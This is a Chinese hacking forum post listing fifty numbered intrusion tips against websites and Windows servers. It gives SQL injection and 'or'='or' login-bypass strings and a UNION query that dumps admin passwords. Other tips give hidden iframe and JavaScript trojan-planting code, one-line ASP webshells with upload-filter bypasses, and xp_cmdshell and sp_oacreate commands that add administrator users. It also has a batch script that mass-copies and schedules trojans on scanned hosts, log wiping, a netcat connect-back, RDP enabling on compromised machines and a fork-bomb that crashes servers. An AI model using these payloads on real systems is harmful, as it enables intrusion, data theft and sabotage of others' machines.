黑客入侵精彩总结1
1.网宽网络有限公司制作的网站基本都有注入漏洞 搜索网宽网络 <BR><BR>2.搜索栏里输入 <BR>关键字%'and 1=1 and '%'=' <BR>关键字%'and 1=2 and '%'=' <BR>比较不同处 可以作为注入的特征字符 <BR><BR>3.登陆框用户名和密码输入'or'='or' 漏洞很老但是现在很是遍地都是 <BR><BR>4.我们先到www.google.com底下搜索一下Co Net MIB Ver 1.0 <BR>密码帐号都是 'or'='or' <BR><BR>5.挂马代码<html> <BR><iframe src="马的地址" width="0" height="0" frameborder="0"></iframe> <BR></html> <BR><BR>6.http://www.wyyfk.com/24小时挂QQ工具 <BR><BR>7.开启regedt32的SAM的管理员权限 检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡,这方法是简单克隆, <BR>net localgroup administrators还是可以看出Guest是管理员来 <BR><BR>7.只要敢想,新浪也可入侵 注入点 <BR>http://igame.sina.com.cn/plaza/event/new/crnt_event_view.asp?event_id=59 <BR>微软官方网站注入点 <BR>http://www.microsoft.com/library/toolbar/3.0/search.aspx?View=en-us&charset=iso-8859-1&qu= <BR><BR>8.ms05016攻击工具用法 mshta.exe test.hta 文件名.后缀名 可以绑上QQ大盗木马 <BR><BR>9.有sa权限sqlserver数据库、并且能sql注入支持fso+asp的服务器 <BR>SQL注入后,如何上传木马, <BR>文章地址 http://hack123.home4u.china.com/0601.htm <BR><BR>10.QQ强制聊天代码 <BR> http://wpa.qq.com/msgrd?V=1&Uin=对方的qq号&Site=ioshenmue&Menu=yes <BR> 使用方法:把代码中的红色的“********”星号换成你想与其聊天的QQ号后复 制到浏览器的地址栏处即可。无论他是否你的好友,你无须加他为好友就能给 他发QQ消息。 <BR><BR>11. mybbs论坛cookie欺骗 后台备份马 <BR><BR>12.软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等 <BR>用法: 安装: instsrv.exe 服务名称 路径 <BR>卸载: instsrv.exe 服务名称 REMOVE <BR><BR>13.以动网为例数据库查找DV_LOG,在上面的查询的字段名里选l_content后面的关键字填上password2,找到的username2=%B7%E7%A4%CE%B0%D7%D2%C2&password2=01180017&username1=%B7%E7%A4%CE%B0%D7%D2%C2&Submit=%CC%ED+%BC%D3 password2=01180017就是他的登陆密码 <BR><BR>14.搜索的技巧 inurl:网址 <BR><BR>15.启航工作室WMS 5.0网站程序漏洞 <BR>在baidu 搜索Powered by: SailingStudio Website Manage System 5.0 (SP1) <BR>利用动画看http://soft.hackbase.com/62/20050530/6824.html <BR><BR>16.很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~ <BR><BR>17.天意商务系统网上依然有 有漏洞 网站具体的样式http://www.wzgcc.org/ <BR>工具下载www.hack6.com <BR>地址栏里,填上天意商务系统的网址就可以了,注意一定要是主页面 <BR><BR>18.SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉 <BR>不能注入时要第一时间想到%5c暴库 <BR><BR>19.这个dbinbd.asp文件插入后门的功能适用于文件名为.asp的所有access数据库不是动网论坛也一样可以使用的,后门隐蔽,几乎发现不了 <BR>工具使用方法动画和所有文件 <BR>http://www.anquanwu.com/bbs/printpage.asp?BoardID=2&ID=811 <BR><BR><BR>20.缺少xp_cmdshell时 <BR>尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll' <BR>假如恢复不成功,可以尝试直接加用户(针对开3389的) <BR>declare @o int <BR>exec sp_oacreate 'wscript.shell',@o out <BR>exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员 <BR><BR>21.批量种植木马.bat <BR>for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中 <BR>for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间 <BR>扫描地址.txt里每个主机名一行 用\\开头 <BR><BR>22.搜索 Powered by Discuz!4.0.0RC3 开放头像的可利用 工具地址www.hack6.com <BR><BR>23.DV7.1用还原数据功能 还原asa木马 <BR><BR>24.凡人网络购物系统V6.0 可以%5c暴库 <BR><BR>25.IPB2.0.2漏洞 构造语句 <BR>$qpid=1) and 1=2 union select 1,2,3,4,5,6,7,8,9,10,member_login_key,12,13,14,15,16,17,18,19,1 from ibf_members where id=1 /* 暴管理员密码 想看动画到黑基里找 IPB<= 2.0.3论坛注入工具 www.hack6.com有下载 <BR><BR>26. 将工具传到邮箱 在下载上右击 复制快捷方式 拥有自己了的下载空间 <BR><BR>27.北京冲QB要宽带号跟绑定宽带的后4位电话,当你扫出北京款待号的密码必须是8位的密码,而且开头是6或8的才可以,因为北京的电话都是6根8开头的而且都是8位的,北京的区名海淀 东城 西城 门头沟 丰台 潮阳 宣武 通州 昌平,去http://cnc.qq.com/bbn/冲 <BR><BR>28.搜索 企业网络办公系统 添'or''=' 登陆 在个人邮箱 上传asp木马 <BR><BR>29.本人原创 搜索"一点点星空驿站 留言本" 默认数据库是gbmdb.mdb 很多网站用这个留言本 但是用搜索引擎搜不到 可以给大家在入寝时多个思路 <BR><BR>30.在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样 执行. <BR><BR>31.目录权限设置变态的话可以用一些方法(比如serv-u溢出)将此web用户提权 可访问全站目录挂马 <BR><BR>32.喜欢网页挂马的看看这篇总结文章吧 <BR>http://hackbase.com/News/hk/2005060611656.html <BR><BR>33.搜索"images/admin" 或".tw/images/admin" 可以找到些台湾的数据库 <BR><BR>34.IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名. <BR>将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下. <BR>.cer 等后缀的文件夹下都可以运行任何后缀的asp木马 <BR><BR>35.telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP <BR>然后用#clear logg和#clear line vty *删除日志 <BR><BR>36.搜索关键字:"Copyright 2003-2004 动易网络" 后面地址改成upfile_soft.asp 这样的漏洞很多 <BR><BR>37.bbsxp的漏洞总结 Powered by BBSxp 5.15/Licence blog.asp中的对id 的过滤不严的漏洞 拿到管理员的前后台密码 工具:bbsxp完全版 cookies 欺骗 bbsxp 过滤了 asp 文件的上传 所以我们这里用 asa 来传马 <BR><BR>38.学会总结入侵思路http://www.hackbase.com/News/hk/2005060811688.html <BR><BR>39.电脑坏了省去重新安装系统的方法 <BR>纯dos下执行, <BR>xp:copy C:\WINDOWS\repair\*.*? 到?c:\windows\system32\config <BR>2k: copy C:\winnt\repair\*.*? 到?c:\winnt\system32\config <BR><BR>40.一般人设置啊拉QQ大盗的时候发信和收信都是同一个信箱,因此当我的机子中了此木马后没有立即杀掉进程,而是用内存编辑工具打开它的进程,查找smtp字样,就会找到它的信箱和密码了。只对1.5以前的管用. <BR><BR>41.内网控制内网 用vidc 还要有一只肉鸡 动画看黑基的 <BR>http://soft.hackbase.com/62/20050608/6878.html <BR><BR>42.有许多管理员用备份的日期做备份数据库的名字 <BR>比如http://www.hack6.com/bbs/databackup/20050601.mdb <BR><BR>43.动网数据库oldusername=%B5%F0%B7%C0&username2=%B5%F0%B7%C0&password2=19841202&adduser=%B5%F0%B7%C0&id=12&Submit=%B8%FC+%D0%C2 <BR>不知道用户名(不是%B8%F0%B7%C0) 转化这个用他本身的页面 <BR>http://www.hack6.com/bbs/showerr.asp?BoardID=0&ErrCodes=10,11&action=%CC%EE%D0%B4%B5%C7%C2%BC%D0%C5%CF%A2 <BR>%CC%EE%D0%B4%B5%C7%C2%BC%D0%C5%CF%A2这句话意思是“填写登录信息” <BR>那么就把%CC%EE%D0%B4%B5%C7%C2%BC%D0%C5%CF%A2换成%B5%F0%B7%C0 可以看到用户名 <BR><BR>44.对付信息监控系统 木马必须是加密的 如net user用不了就用net1 user等等 我是大连的 大连这边主机用这方法好用 可以直接传加密的马 用用黑基tyrant的方法 上传一个cmd的aspshall 用nc连接自己的nc监听端口 在web目录下写个加ftp用户的txt 本地43958用nc提交 ftp到服务器加用户 <BR><BR>45.解决TCP/IP筛选 在注册表里有三处,分别是: <BR>HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip <BR>HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip <BR>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip <BR>分别用 <BR>regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip <BR>regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip <BR>regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip <BR>命令来导出注册表项 <BR>然后把三个文件里的EnableSecurityFilters"=dword:00000001, <BR>改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用 <BR>regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可 <BR><BR>46.使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U <BR>SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3。 <BR><BR>47.开3389的5种方法 <BR>(1)打开记事本,编辑内容如下: <BR>echo > c:\sql <BR>echo TSEnable = on >> c:\sql <BR>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q <BR>编辑好后存为BAT文件,上传至肉鸡,执行。 <BR>(2) (对xp\2000都有效) 脚本文件 本地开3389 工具:rots1.05 <BR>下载地址:www.netsill.com/rots.zip <BR>在命令行方式下使用windows自带的脚本宿主程序cscript.exe调用脚本,例如: <BR>c:\>cscript ROTS.vbs <目标IP> <用户名> <密码> [服务端口] <BR>如果要对本地使用,IP地址为127.0.0.1或者一个点(用.表示),用户名和密码都为空(用 ""表示)。 <BR>(3)djshao正式版5.0 <BR>解压djshao5.0.zip,用你的随便什么方法把把解压出来的djxyxs.exe上传到肉鸡的c:\winnt\temp下,然后 进入c:\winnt\temp目录执行djxyxs.exe解压缩文件,然后再执行解压缩出来的azzd.exe文件,等一会肉鸡 会自动重启!重启后会出现终端服务 <BR>(4)下载DameWare NT Utilities 3.66.0.0 注册版 <BR>地址www.netsill.com/dwmrcw36600.zip <BR>安装注册完毕后输入对方IP用户名密码,等待出现是否安装的对话框点是。 <BR>复制启动后出现对方桌面。 <BR>在对方桌面进入控制面版,点添加或删除程序。进入后点添加/删除windows组件,找到终端服务,点际进入 后在启动终端服务上打上勾。确定自动提示重起,重起后OK <BR>(5)大家最常用的 3389.exe 下载地址www.hack6.com 把程序上传到肉鸡运行后重启既可 <BR><BR>48.QQ上得到别人的IP <BR>一般跟别人聊天 如果是对方先对你说话 那么她的IP显示出来的概率就大 <BR>当然如果是我们找对方 可以先跟她说发过去消息之后 然后关闭窗口等待她的回复 <BR>还可以用天网防火墙选择上UDP数据保检测,即可拦截到对方ip <BR><BR>49.挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马 <BR><BR>50.让服务器重启 <BR>写个bat死循环: <BR>@echo off <BR>:loop1 <BR>cls <BR>start cmd.exe <BR>goto loop1 <BR>保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
页:
[1]